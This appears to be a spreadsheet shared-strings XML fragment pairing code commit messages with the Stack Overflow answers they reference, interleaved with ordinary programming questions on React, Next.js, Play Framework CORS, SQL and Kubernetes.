    <t>Because we're sharing it, the MongoDB is free. MongoDB is down &amp; up.
MERN stack secure authentication Part 2 | MongoDB | JWT, Cookies, Bcrypt, React Hooks, Context. - YouTube
https://www.youtube.com/watch?v=St0_qSe7RCE&amp;list=PLJM1tXwlGdaf57oUx0rIqSW668Rpo_7oU&amp;index=2
reactjs - How to implement the back-end of an Edit Profile Page? - Stack Overflow
https://stackoverflow.com/questions/75165712/how-to-implement-the-back-end-of-an-edit-profile-page
`ReferenceError: require is not defined in ES module scope, you can use import instead`
javascript - ReferenceError: require is not defined in ES module scope, you can use import instead gulp sass - Stack Overflow
Can you check the "type" part in the package.json file? If the type part is module, you will get this error. You have to make it Commonjs.
https://stackoverflow.com/questions/69099763/referenceerror-require-is-not-defined-in-es-module-scope-you-can-use-import-in</t>
  </si>
  <si>
    <t>While many node libraries support both require and import, I do occasionally run into cases where one library I need to use doesn't support require and another doesn't support import.
You can use createRequire to define require within an ES6 module and use that to also import Common JS libraries. Following is a sample code how to use it.
import { createRequire } from "module";
const require = createRequire(import.meta.url);
import crypto from 'crypto'
const fs = require('fs')
This answer is lifted straight from the this page: https://dev.to/caspergeek/how-to-use-require-in-ecmascript-modules-1l42</t>
  </si>
  <si>
    <t xml:space="preserve">I am a developer.  An architect on good days.  Somehow I find myself also being the DBA for my small company.  My background is fair in the DB arts but I have never been a full fledged DBA.  My question is what do I have to do to ensure a realiable and reasonably functional database environment with as little actual effort as possible?
I am sure that I need to make sure that backups are being performed and that is being done.  That is an easy one.  What else should I be doing on a consistant basis?  
</t>
  </si>
  <si>
    <t>C380</t>
  </si>
  <si>
    <t>client: fix Player state set when component unmounts
reference: https://stackoverflow.com/questions/53949393/cant-perform-a-react-state-update-on-an-unmounted-component</t>
  </si>
  <si>
    <t xml:space="preserve">Our projects are using objects as the data source to reports.
Our business layer is returning single objects or IEnumerable. Our reports (quite complex) need to display value-type properties of the object, and its related objects.
Typical case would be, from a List, display a master report with category data, then a subreport with data for each Product inside each Category, then a subreport for each Part of each Product, and so on.
Reporting from the database is not an option for us.
We have tried so far
- Reporting Services : works but have to mess around with the XML definition of the report to define the datasource classes, very hard to work with if you use an object datasource, architecturally not too clean
- Telerik Reports : quite nice (esp., nice architecture) but seems to have problems with complex reports (master/sub), does not give great paging control, rumored to have performance/crash problems (immature product).
Does anyone know a good reporting solution that can be integrated in an ASP.NET application and works well with objects as datasources ? 
</t>
  </si>
  <si>
    <t>C381</t>
  </si>
  <si>
    <t>Found workaround for styled-components bug
https://stackoverflow.com/a/53902817</t>
  </si>
  <si>
    <t>I am guessing you are using styled-components 4.1. It's their typing definition bug. The easy way is to downgrade to and lock the version to 4.0.3.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have tried the answer in &lt;a href="https://stackoverflow.com/questions/54277921/kotlin-kcallable-illegalargumentexception"&gt;this post&lt;/a&gt; but I still get the error in my Kotlin Android project.&lt;/p&gt;
&lt;p&gt;Here is how my code looks like:&lt;/p&gt;
&lt;pre class="lang-kotlin prettyprint-override"&gt;&lt;code&gt;interface BaseServiceScope {
    suspend fun resolveState2(intent: Intent?) {
        // starts a task
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I call this function from an instance of my interface: [class &lt;code&gt;BaseService&lt;/code&gt;]&lt;/p&gt;
&lt;pre class="lang-kotlin prettyprint-override"&gt;&lt;code&gt;::resolveState2.let { target -&amp;gt;
    commit(
        target,
        this@BaseServiceScope,
        this@invoke) 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;commit&lt;/code&gt; function is:&lt;/p&gt;
&lt;pre class="lang-kotlin prettyprint-override"&gt;&lt;code&gt;fun commit(step: KCallable&amp;lt;*&amp;gt;, vararg args: Any?) =
    step.call(*args) // runtime error happens on this line
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The runtime error is:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;IllegalArgumentException: argument 1 has type android.content.Intent, got net.consolator.BaseService
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I don't pass the receiver I get a different error:&lt;/p&gt;
&lt;pre class="lang-kotlin prettyprint-override"&gt;&lt;code&gt;::resolveState2.let { target -&amp;gt;
    commit(
        target,
        this@invoke) 
&lt;/code&gt;&lt;/pre&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;IllegalArgumentException: Callable expects 2 arguments, but 1 were provided.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C382</t>
  </si>
  <si>
    <t>feat: Authentication route with PrivateRoute components
https://stackoverflow.com/questions/43164554/how-to-implement-authenticated-routes-in-react-router-4</t>
  </si>
  <si>
    <t>You're going to want to use the
Redirect
component. There's a few different approaches to this problem. Here's one I like, have a PrivateRoute component that takes in an
authed
prop and then renders based on that props.
function PrivateRoute ({component: Component, authed, ...rest}) {
  return (
    &lt;Route
      {...rest}
      render={(props) =&gt; authed === true
        ? &lt;Component {...props} /&gt;
        : &lt;Redirect to={{pathname: '/login', state: {from: props.location}}} /&gt;}
    /&gt;
  )
}
Now your
Route
s can look something like this
&lt;Route path='/' exact component={Home} /&gt;
&lt;Route path='/login' component={Login} /&gt;
&lt;Route path='/register' component={Register} /&gt;
&lt;PrivateRoute authed={this.state.authed} path='/dashboard' component={Dashboard} /&gt;
If you're still confused, I wrote this post that may help -
Protected routes and authentication with React Router v4</t>
  </si>
  <si>
    <t xml:space="preserve">I'm writing this question from the standpoint of an ASP.NET application. However I realize it may be suited to other contexts as well.
There are so many approaches to developing the common elements of an ASP.NET website.  Here are a few I have come across:
LLBLGen
SubSonic
LINQ to SQL
Entity Framework
CodeSmith + .netTiers
NHibernate
Hand coding DAL/BLL/Presentation
I don't consider myself an expert developer by any means, however I do understand common OOP techniques well, and can get through all my projects just fine.  I do however struggle with knowing how to 'architect' a site.  By that, I mean, should I use 
[external-link]?  Is that still the gold standard and the above tools just utilize that concept?  I'm pretty sure I want to hold off on MVC until a future (or final) release.   
*****Edit:  I have removed the portion of the question which deals with patterns (singleton, factory) after having more fully understood the separation of the question.  Thank you for all who have answered this part so far, however, my main focus is on the architecture portion.*****
Edit #2: I changed the title to be more of an agnostic question upon realizing this would apply to more than web-specific architecture.
Question: What steps do I take as a first step, when I have sat down in front of a blank canvas (solution file) with all my pre-written documentation and system requirements in hand ? Where do I go from there?
</t>
  </si>
  <si>
    <t>C383</t>
  </si>
  <si>
    <t xml:space="preserve">pass a component to another component https://stackoverflow.com/questions/56937379  </t>
  </si>
  <si>
    <t>You cannot pass a component to another component through a prop. For that you need to use a slot. So your code would look like:
&lt;dynamic-form
  :headingText="currentHeadingText"
  :sectionHeadingText="currentSectionHeadingText"
&gt;
  &lt;actual-form/&gt;
&lt;/dynamic-form&gt;
And in the
&lt;dynamic-form&gt;
component you would write:
&lt;template&gt;
  []
  &lt;slot&gt;&lt;/slot&gt;
  []
&lt;/template
Then the
&lt;actual-form&gt;
component would be included at the position of the
&lt;slot&gt;
-tag. You can also use multiple slots and pass in multiple components / template  segments. (Read the docs on vuejs.org for detailed information)
I am not completely sure what you are trying to do though. Maybe you need to structure your application in a different way. E.g. use the
&lt;dynamic-form&gt;
in the template of the
&lt;actual-form&gt;
. You could then still pass props to
&lt;dynamic-form&gt;
and fill slots therein from the
&lt;actual-form&gt;
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm finally getting around to rebuilding my personal site, and I like to put my location as part of the footer, in this case, starting at which parallel universe down to the protocol my site is using. ex: Universe Î”-1701 | Laniakea S.Cluster | Local Group | Milky Way | Alpha Quadrant etc.&lt;/p&gt;
&lt;p&gt;Making the page reactive to resizing/ using different screen widths, the location tagline wraps around to the next line as its supposed to. However, for the appearance I'm looking for, I'd like it to wrap whole location units, not just words. ex: Universe Î”-1701 | Laniakea S.Cluster | Local Group | Milky &lt;em&gt;&lt;strong&gt;(here is where the screen would break to the next line)&lt;/strong&gt;&lt;/em&gt; Way | Alpha Quadrant - but I want it to: Universe Î”-1701 | Laniakea S.Cluster | Local Group | &lt;em&gt;&lt;strong&gt;(here is where I want it to break to the next line)&lt;/strong&gt;&lt;/em&gt; Milky Way | Alpha Quadrant.&lt;/p&gt;
&lt;p&gt;Is it even possible to get base HTML to do this, or do I need to make these into inline graphics to get them to wrap the way I'm wanting it to?&lt;/p&gt;
&lt;p&gt;Update: beyond trying    tags, I didn't even know what else to try. None of which seemed to effect the situation.&lt;/p&gt;
&lt;p&gt;That said, the answer to this entire question was the Â  character. I turned each location element into a single entity by surrounding each with straight braces (or whatever this thing is called: | ) and then using the nbsp character code for the spaces.&lt;/p&gt;
&lt;p&gt;Which was kinda sad that it was that simple because I've been using nbsp for layout formatting since the 90s, lol. I never even realized it didn't break lines, but that does explain the &amp;quot;non-breaking&amp;quot; part of the character name.&lt;/p&gt;
&lt;p&gt;Thanks to Barmar for such a simple and elegant solution.&lt;/p&gt;
&lt;p&gt;The final product:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;Universe&amp;amp;nbsp;&amp;amp;Delta;-1701&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;Laniakea&amp;amp;nbsp;S.Cluster&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;Local&amp;amp;nbsp;Group&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;Milky&amp;amp;nbsp;Way&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;Alpha&amp;amp;nbsp;Quadrant&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;Sagitarius&amp;amp;nbsp;Arm&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;Sol&amp;amp;nbsp;Sector&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;WWW&amp;amp;colon;&amp;amp;nbsp;Earth.Net&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;Datanet&amp;amp;colon;&amp;amp;nbsp;North&amp;amp;nbsp;America&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span&amp;gt;https&amp;amp;colon;&amp;amp;nbsp;FCCorp.US&amp;lt;/span&amp;gt;&amp;amp;nbsp;&amp;lt;span class=&amp;quot;whiteb&amp;quot;&amp;gt;|&amp;lt;/span&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C384</t>
  </si>
  <si>
    <t>moved main extension logic to App component to maintain create-react-app convention
see: https://stackoverflow.com/a/50493780</t>
  </si>
  <si>
    <t xml:space="preserve">This is one of those little detail (and possibly religious) questions.  Let's assume we're constructing a REST architecture, and for definiteness lets assume the service needs three parameters, x, y, and z.  Reading the various works about REST, it would seem that this should be expressed as a URI like  
[external-link] x / y / z
Having written a lot of CGIs in the past, it seems about as natural to express this  
[external-link]
Is there any particular reason to prefer the all-slashes form?
</t>
  </si>
  <si>
    <t>C385</t>
  </si>
  <si>
    <t>chore: add custom.d.ts file for svg types
Had to create a custom type so that we can import svg files into
our components. See this Slack Overflow issue:
https://stackoverflow.com/questions/44717164/unable-to-import-svg-files-in-typescript</t>
  </si>
  <si>
    <t>If you use webpack, you can do this by creating a custom types file.
Create a file named
custom.d.ts
with the following content:
declare module "*.svg" {
  const content: React.FunctionComponent&lt;React.SVGAttributes&lt;SVGElement&gt;&gt;;
  export default content;
}
Add the
custom.d.ts
to
tsconfig.json
as below
"include": ["src/components", "src/custom.d.ts"]
Source:
https://webpack.js.org/guides/typescript/#importing-other-assets</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to get the gpiozero module into Thonny for a while (for use with a Raspberry Pi) and I've been having lots of issues with it. I installed gpiozero using the package installed inside Thonny and then called import gpiozero on line 1. However, I keep getting some sort of error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Traceback (most recent call last):
  File &amp;quot;&amp;lt;stdin&amp;gt;&amp;quot;, line 1, in &amp;lt;module&amp;gt;
  File &amp;quot;/lib/gpiozero/__init__.py&amp;quot;, line 19, in &amp;lt;module&amp;gt;
  File &amp;quot;/lib/gpiozero/pins/__init__.py&amp;quot;, line 12, in &amp;lt;module&amp;gt;
ImportError: no module named 'warnings'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried downloading the warnings module and importing it to but that didn't work. I also tried this with several other modules, such as pyautogui, keyboard, and krpc. None of these worked either. I have tried deleting Thonny and reinstalling it (64 bit, python 3.10) and that didn't work either. In addition I have also been getting a weird error from the Thonny module installer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Copying colorzeroError (ManagementError(...), 'Command output was not empty')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What's going on?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C386</t>
  </si>
  <si>
    <t xml:space="preserve">Problem: how to provide a distributed, scalable and disaster resistant pub/sub service with WCF.
Details:
Note that this approach is being considered in addition to messaging/middleware solutions such as Tibco EMS.
I've been looking into WCF, particularly how it may be used to offer pub/sub.  On this subject this article is very good: [external-link].
In the article the author attempts to tackle the problem of having multiple publishers (as one would have with a service layer scaled across several boxes).  The problem being that if client A registers with Publisher A but Publisher B wishes to publish an event, then publisher B won't know about client A.  i.e. no one told publisher B that client A wanted to be notified about events.  The author suggests a pub/sub service as a solution.  The pub/sub service would centrally store subscriptions.  However, if I wanted to make the pub/sub service disaster resistant by having a secondary/dual pub/sub service then I have the same original problem.
So, I think there are a couple of solutions to the problem:
Store subscriber details in a distributed cache (see questions: [external-link] and [external-link]).
Store subscriber details in a database/central file system.
Can anyone think of any other solutions (i.e. I've not missed some fantastic magical feature of WCF?)
Any comments appreciated.
</t>
  </si>
  <si>
    <t>C387</t>
  </si>
  <si>
    <t>Moved React-ui-components outside of pages, refer to: https://stackoverflow.com/questions/65598753/cant-build-react-next-project-found-page-without-a-react-component-as-default/65598867</t>
  </si>
  <si>
    <t>You should move your
components
outside the
pages
folder.
pages/
should only be used for page components as
Next.js routing is based on its structure
.
Next.js has a file-system based router built on the concept of pages.
When a file is added to the pages directory it's automatically available as a route.
By default, Next.js assumes anything under the
pages
folder is a page component and will try to build each file as a page.
Even though the above is the default behaviour, you can configure your Next.js app to
include non-page files in the
pages
directory
.
To do so, you can modify the
pageExtensions
entry in the
next.config.js
file as shown below. Then rename your page components to have a file extension that includes
.page
(
_document.page.js
,
_app.page.js
,
index.page.js
, etc).
module.exports = {
    pageExtensions: ['page.tsx', 'page.ts', 'page.jsx', 'page.js']
}
With this configuration, Next.js will ignore any file that doesn't contain
.page
for the purpose of building pages/API routes and routing.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on creating a custom reporting feature where the user can supply different criteria that would be used as the &lt;code&gt;WHERE&lt;/code&gt; clause for data to be pulled and they can also choose specific data to be pulled in the &lt;code&gt;SELECT&lt;/code&gt; clause.&lt;/p&gt;
&lt;p&gt;Assume that none of the columns have indexes as I can't guarantee that some will. My main concern is some of the items in the &lt;code&gt;SELECT/WHERE&lt;/code&gt; clause can be user defined functions which I'm concerned can tank performance.&lt;/p&gt;
&lt;p&gt;My thought was to have a temp table of &lt;code&gt;ID&lt;/code&gt;s (ex., &lt;code&gt;user_id&lt;/code&gt;) which I would populate with records that match the first &lt;code&gt;WHERE&lt;/code&gt; clause and then from there remove &lt;code&gt;user_id&lt;/code&gt;'s from the temp table that don't match the subsequent &lt;code&gt;WHERE&lt;/code&gt; clauses.&lt;/p&gt;
&lt;p&gt;With this process, I could then make sure that any user defined functions are applied last and are performed on as small of a set of data as possible to hopefully provide optimal performance. I would then perform the &lt;code&gt;SELECT&lt;/code&gt; on this smaller set of data as well. I'm wondering if SQL is smart enough to already do this as part of it's optimizations? Or if not, could this have actual performance benefits?&lt;/p&gt;
&lt;p&gt;Here's a quick sample of what I'm describing (I haven't actually run this so there could be syntax errors)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE #tempTable 
(
    user_id uniqueidentifier NULL, 
    user_name varchar(50) NULL
)
-- add data with first WHERE item
INSERT INTO #tempTable (user_id, user_name) 
    SELECT user_id 
    FROM users 
    WHERE date_added &amp;gt;= '1/1/2024'
-- remove data that doesn't match second WHERE item
DELETE FROM #tempTable 
JOIN users ON #tempTable.user_id = users.user_id 
WHERE system_admin = 0 
-- remove data that doesn't match third WHERE item -&amp;gt; hoping the function being last provides a performance boost
DELETE FROM #tempTable 
WHERE dbo.get_login_count(user_id) &amp;lt; 100
-- hoping that only having the function on records that are needed speeds up performance
SELECT user_name, dbo.get_most_recent_login(user_id) 
FROM #tempTable 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's what this might look like without being broken out and using a temp table&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-- note that the second and third where statements are flipped since they were being deleted above and now are what I want included
SELECT user_name, dbo.get_most_recent_login(user_id) 
FROM users 
WHERE date_added &amp;gt;= '1/1/2024' AND system_admin = 1 
  AND dbo.get_login_count(user_id) &amp;gt;= 100
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C388</t>
  </si>
  <si>
    <t>feat: add support for rn-web specific style props
Add support for style props that are specific to rendering text-field component on web.
See https://stackoverflow.com/a/62431191/237637</t>
  </si>
  <si>
    <t>According to react-native-web type definition (link), the available properties are:
outlineColor?: ColorValue,
outlineOffset?: string | number,
outlineStyle?: string,
outlineWidth?: string | number, // set to 0 to disable outline
You can change the outline color using:
&lt;TextInput style={Platform.OS === "web" &amp;&amp; {outlineColor: "orange" }} /&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We have been doing some research into physically isolating the secure and non-secure sections of our web application into two applications.  All "http" requests would be served by one server (or cluster) and all "https" requests would be served by another server (or cluster).
The reason that we are looking into this is partially for the survivability of the application.  Since the secure section of the application is revenue generating we could, for example, have a larger and/or more powerful cluster to serve the requests.  Conversely, when we upgrade the hardware in the secure application, it could be re-purposed to serve the non-secure site - basically extending the life of the servers.
Has anyone worked with this approach?  We had an RFP out to a (well known) vendor last year for an architectural assessment and this was one of the possible paths that was recommended.  While I see the potential upside, I worry about things such as maintenance, deployment, version control, etc.
</t>
  </si>
  <si>
    <t>C389</t>
  </si>
  <si>
    <t>Remove next Image component for now
It is a server side feature and not supported in static sites
https://stackoverflow.com/questions/65487914/error-image-optimization-using-next-js-default-loader-is-not-compatible-with-n</t>
  </si>
  <si>
    <t>From Next.js 12.3, you can completely disable
next/image
Image Optimization using the
unoptimized
configuration in
next.config.js
. This avoids having to use a third-party provider to optimize the image when using
next/export
.
From the
next/image
documentation:
unoptimized
- When true, the source image will be served as-is
instead of changing quality, size, or format. Defaults to
false
.
module.exports = {
    images: {
        unoptimized: true
    }
}
Before Next.js 12.3 and from 12.2, the
unoptimized
configuration was still experimental and could be enabled under the
experimental
flag.
module.exports = {
    experimental: {
        images: {
            unoptimized: true
        }
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have code that does a regex match, with some optional capturing groups. The code looks something like this:&lt;/p&gt;
&lt;pre class="lang-typescript prettyprint-override"&gt;&lt;code&gt;const match = /some (regex) with (capturing) (groups)/.exec(myInput);
/* eslint-disable-next-line @typescript-eslint/no-unnecessary-condition */
const hideVersion = match[4]?.includes('h');
//                          ^
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My code that looks at the fourth match result, which may or may not exist. I get execution errors if I don't check that &lt;code&gt;match[4]&lt;/code&gt; exists before trying to use it, because it may not be there.&lt;/p&gt;
&lt;p&gt;Why is &lt;code&gt;@typscript-eslint&lt;/code&gt; complaining about this check? Is there a way I could rewrite the code such that I'm making the necessary check without making &lt;code&gt;@typescript-eslint&lt;/code&gt; unhappy?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C39</t>
  </si>
  <si>
    <t xml:space="preserve">support CORS headers
There were a couple of requests at the hack day to support
[CORS headers][1].  We got by with JSONP instead, but CORS is a more
robust solution to the problem of cross-origin javascript requests.
This code is mostly copy-pasted from this stackoverflow answer:
http://stackoverflow.com/questions/25152277/play-framework-2-3-cors-headers
</t>
  </si>
  <si>
    <t>Solved this by:
All API responses from the server should contain a header: “Access-Control-Allow-Origin”, “*”. We need to write a wrapper for all action responses.
In Global.java
import java.net.URL;
import play.*;
import play.libs.F.Promise;
import play.mvc.Action;
import play.mvc.Http;
import play.mvc.Result;
public class Global extends GlobalSettings {
  // For CORS
  private class ActionWrapper extends Action.Simple {
    public ActionWrapper(Action&lt;?&gt; action) {
      this.delegate = action;
    }
    @Override
    public Promise&lt;Result&gt; call(Http.Context ctx) throws java.lang.Throwable {
      Promise&lt;Result&gt; result = this.delegate.call(ctx);
      Http.Response response = ctx.response();
      response.setHeader("Access-Control-Allow-Origin", "*");
      return result;
    }
  }
  @Override
  public Action&lt;?&gt; onRequest(Http.Request request,
      java.lang.reflect.Method actionMethod) {
    return new ActionWrapper(super.onRequest(request, actionMethod));
  }
}
Server requests like POST, PUT make a preflight request to the server before the main request. The response for these preflight requests should contain below headers:
“Access-Control-Allow-Origin”, “
”
“Allow”, “
”
“Access-Control-Allow-Methods”, “POST, GET, PUT, DELETE, OPTIONS”
“Access-Control-Allow-Headers”, “Origin, X-Requested-With, Content-Type, Accept, Referer, User-Agent”
In routes add:
OPTIONS /*all                           controllers.Application.preflight(all)
In Application Coltroller:
package controllers;
import play.mvc.*;
public class Application extends Controller {
    public static Result preflight(String all) {
        response().setHeader("Access-Control-Allow-Origin", "*");
        response().setHeader("Allow", "*");
        response().setHeader("Access-Control-Allow-Methods", "POST, GET, PUT, DELETE, OPTIONS");
        response().setHeader("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept, Referer, User-Agent");
        return ok();
    }
}
PS: By this approach I did not have to create a scala filter for this.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Did GLM_FORCE_SIMD_AVX2 change to GLM_FORCE_AVX2? Because in the manual.pdf and the sources I've seen on the internet says:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define GLM_FORCE_SIMD_AVX2 
#include &amp;lt;glm/glm.hpp&amp;gt; 
// If the compiler doesnâ€™t support AVX2 instrinsics, compiler errors will happen. 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I did a complete search for GLM_FORCE_SIMD_AVX2 and the only place it comes up is in manual.pdf.&lt;/p&gt;
&lt;p&gt;However I did find GLM_FORCE_AVX2 in one place, in a file called platform.h. It must have changed, right? Am I just supposed to define GLM_FORCE_AVX2 before I include any GLM headers? Because I still don't think this is activating it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C390</t>
  </si>
  <si>
    <t xml:space="preserve">I was listening to the Hansel Minutes podcast from 11/24 talking about Moonlight.
To paraphrase, Scott made the comment that Microsofts attitude about open source is quickly changing, especially with the adoption of MVC architecture.
I admit I don't have the best 'big picture' grasp of what MVC means to the developement world, but specifically I want to know how does it benefit open source communities?
</t>
  </si>
  <si>
    <t>C391</t>
  </si>
  <si>
    <t>Create processes lazily
As mentioned in [1]:
&gt; JUnit creates a new instance of the test class before invoking each
&gt; @test method. This helps provide independence between test methods and
&gt; avoids unintentional side effects in the test code. Because each test
&gt; method runs on a new test class instance, we can’t reuse instance
&gt; variable values across test methods.
Each `@Test` method would create a new instance of the test classes,
which means each `@Test` method would create N new processes.
[1]: https://stackoverflow.com/questions/14010222/junit-new-instance-before-invoking-each-test-method-what-are-the-benefits</t>
  </si>
  <si>
    <t>How to see the real benefits of the approach described in the book?
The purpose of separate instance is not for any benefit but to maintain the contract that each test should be independently executed without any effect of the execution of a previous test. There is just no other way to ensure this contract other than using a different instance for each test.
For example, the Spring transaction management makes sure to rollback all changes made to the database by a test, by default, to maintain the same contract.
So, using static variables in a test is generally discouraged as it will defeat the whole purpose of one-instance-per-test to have a clean slate for each test.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to implement the following using Jetpack Compose:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Display an image about a map&lt;/li&gt;
&lt;li&gt;Add some markers on top of this map to specific positions&lt;/li&gt;
&lt;li&gt;When the user zooms or pans the map, the markers should stick to their original positions relative to the map, and keep their original size&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have the following code for this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Composable
fun ZoomableImageWithMarkers(
imageUrl: String,
markers: List&amp;lt;Pair&amp;lt;Float, Float&amp;gt;&amp;gt;
) {
var scale by remember { mutableStateOf(1f) }
var offset by remember { mutableStateOf(Offset.Zero) }
Box(
    modifier = Modifier
        .fillMaxSize()
        .pointerInput(Unit) {
            detectTransformGestures { _, pan, zoom, _ -&amp;gt;
                scale *= zoom
                offset += pan
            }
        },
    contentAlignment = Alignment.Center
) {
    Image(
        painter = rememberAsyncImagePainter(imageUrl),
        contentDescription = null,
        modifier = Modifier
            .graphicsLayer(
                scaleX = scale,
                scaleY = scale,
                translationX = offset.x,
                translationY = offset.y
            )
            .fillMaxWidth()
    )
    markers.forEach { (normalizedX, normalizedY) -&amp;gt;
        Image(
            painter = painterResource(id = R.drawable.marker),
            contentDescription = &amp;quot;Marker&amp;quot;,
            modifier = Modifier
                .graphicsLayer(
//                        scaleX = scale, // If this is here, markers scale along with the image and stick to their place
//                        scaleY = scale,
                    translationX = offset.x,
                    translationY = offset.y
                )
                .offset(
                    x = (normalizedX * 100).dp, 
                    y = (normalizedY * 100).dp
                )
                .size(24.dp)
        )
    }
}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I'm calling it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;val exampleMarkers = listOf(
    Pair(0.3f, 0.5f),  // 30% X, 50% Y (relative to image size)
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I let the markers to be scaled along with the map, it works fine, but when I don't, the following issue happens:
&lt;a href="https://i.sstatic.net/65RFfpqB.gif" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/65RFfpqB.gif" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;So the marker is moving upwards (relative to the map) when I'm zooming in, down when I'm zooming out. As far as I can see, it's keeping its position relative to my zooming fingers, but I need it to keep its position relative to the map.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C392</t>
  </si>
  <si>
    <t>feat: update progress
- Added example to `DOCKER_ID` environment variable in `.env.example`. Done to make it easier to add id without looking at code.
- Changed service type of `gateway` component to node port. Unlike google cloud or AWS, minikube doesn't have load balancer integrated. More solution can be found here: https://stackoverflow.com/questions/44110876/kubernetes-service-external-ip-pending</t>
  </si>
  <si>
    <t>It looks like you are using a custom Kubernetes Cluster (using
minikube
,
kubeadm
or the like). In this case, there is no LoadBalancer integrated (unlike AWS or Google Cloud). With this default setup, you can only use
NodePort
or an Ingress Controller.
With the
Ingress Controller
you can setup a domain name which maps to your pod; you don't need to give your Service the
LoadBalancer
type if you use an Ingress Controller.</t>
  </si>
  <si>
    <t xml:space="preserve">Perhaps my question is similar in nature to this one: [external-link]
The programs that I write are small 50-75 K line programs mostly using [external-link] and [external-link].  These programs are GUI intensive allowing the design and layout of various graphics and graphics processing.
I consider myself good at OOP and practiced at balancing OOP and traditional procedural methods to create maintainable code.
